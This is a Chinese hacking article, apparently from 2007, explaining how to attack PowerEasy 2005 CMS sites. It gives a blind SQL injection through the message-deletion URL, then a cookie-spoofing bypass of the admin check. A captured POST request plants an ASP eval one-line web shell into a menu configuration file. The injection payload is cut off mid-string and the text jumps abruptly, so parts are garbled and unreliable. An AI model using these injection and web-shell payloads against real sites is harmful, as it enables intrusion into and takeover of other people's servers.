推荐:动易2005上传漏洞(图)
作者:佚名 文章来源:不详 点击数: 更新时间:2007-4-20 22:01:20
好久没写文章了,此文主要给大家讲解二个技巧:一是灵巧的注入;二是不进后台巧妙的上传WebShell。希望各位朋友能举一反三,有不当之处请高手指教。
一、注入漏洞
因一朋友想让帮他看一个站,装的是动易2005ACCESS版,以前和LLIKZ发现动易SQL版存在短消息注入漏洞,因为能执行多语句所以利用起来相对容易一些(其实ACCESS也存在漏洞,因手工猜测起来比较麻烦,所以就一保留了,哈哈)。此站的漏洞同样是在短消息这个地方,不同的是它是ACCESS版,首先注册一个用户,然后登录,如果进入后用户控制面板没有短消息功能,你可以试试在网址中输入http://www.***.com/user/user_message.asp
先给自己发一个短消息然后在删短消息,如果我们在删除的短消息的能数MessageID=1; 后加一个分号系统返回“语法错误 在查询表达式
'Incept='admin' and ID in (4;)' 中。”说明存在注入漏洞。如下图所示:
为什么报错呢?大家仔细看一下,在SQL中in后面应该是一个集合,但是4后面多了一个分号这样就不出现了语法错误。经过测试发现只有存在语法错误的时候才会报错,哪怎么能通过这个报错来实现注入呢?因此想到了iif语句,构造的语句如下:/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=1)and%201=(select%20top%201%20iif(asc(mid(password,1,1))//数据库连接文件
//有关函数定义的文件
//检查管理权限的文件
//顶部栏目菜单设置文件
如果确定是管理员以后,会把我们设置的参数的内容写到RootClass_Menu_Config.asp文件中,如果来绕过Admin_ChkPurview.asp这个文件呢?大家看它有这样一段代码:
'检查管理员是否登录
AdminName
=
ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("AdminName")))//管理员名
AdminPassword
=
ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("AdminPassword")))//管理员md5密码
RndPassword
=
ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("RndPassword")))//管理员的一个随机密码
程序就是通过这三个变量确定是不是管理员,而且它们都是在Cookies中取得的,这样我们就可以通过抓包Cookie欺骗了。
具体方法:先在本地机器装好系统,登录后台,点击顶部栏目菜单管理,在菜单背景图片:栏中按填入如下代码:
"%>
<%'然后抓包如下:
POST /admin/Admin_RootClass_Menu.asp HTTP/1.1
Accept:
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-powerpoint,
application/vnd.ms-excel, application/msword, */*
Referer: http://178.126.0.234/admin/Admin_RootClass_Menu.asp?ChannelID=1
Accept-Language:
zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding:
gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
SV1; .NET CLR 1.1.4322)
Host: 178.126.0.234
Content-Length:
1009
Connection: Keep-Alive
Cache-Control: no-cache
Cookie:
ASPSESSIONIDQCSBQACQ=IFFFGAKDHJPAJJCCDGOKMOEN; SendMessage=Yes;
1781260234=AdminName=admin&RndPassword=5748509MMHo36NDH&AdminPassword=469e80d32c0559f8&CookieDate=1;
VisitNum=1
RCM_Menu_1=4&RCM_Menu_2=0&RCM_Menu_3=0&RCM_Menu_4=2&RCM_Menu_5=3&RCM_Menu_6=6&RCM_Menu_7=7&RCM_Menu_8=100&RCM_Menu_9=filter%3AGlow%28Color%3D%23000000%2C+Strength%3D3%29&RCM_Menu_10=4&RCM_Menu_12=23&RCM_Menu_13=50&RCM_Menu_14=2&RCM_Menu_15=4&RCM_Menu_16=%23999999&RCM_Menu_17=%23ffffff&RCM_Menu_18=%22%25%3E%3CSCRIPT+RUNAT%3DSERVER+LANGUAGE%3DJAVASCRIPT%3Eeval%28Request.form%28%27yongger%27%29%2B%27%27%29%3C%2FSCRIPT%3E%3C%25%27&RCM_Menu_19=3&RCM_Menu_20=1&RCM_Menu_21=1&RCM_Menu_22=%23ACA899&RCM_Item_12=&RCM_Item_13=&RCM_Item_14=0&RCM_Item_15=0&RCM_Item_16=0&RCM_Item_17=&RCM_Item_18=&RCM_Item_19=0&RCM_Item_20=0&RCM_Item_21=0&RCM_Item_22=0&RCM_Item_23=1&RCM_Item_24=%23F1F2EE&RCM_Item_25=1&RCM_Item_26=%23CCCCCC
相关专题:
 网友评论:(评论内容只代表网友观点,与本站立场无关!) |
- GOOGLE广告
阅读排行
|
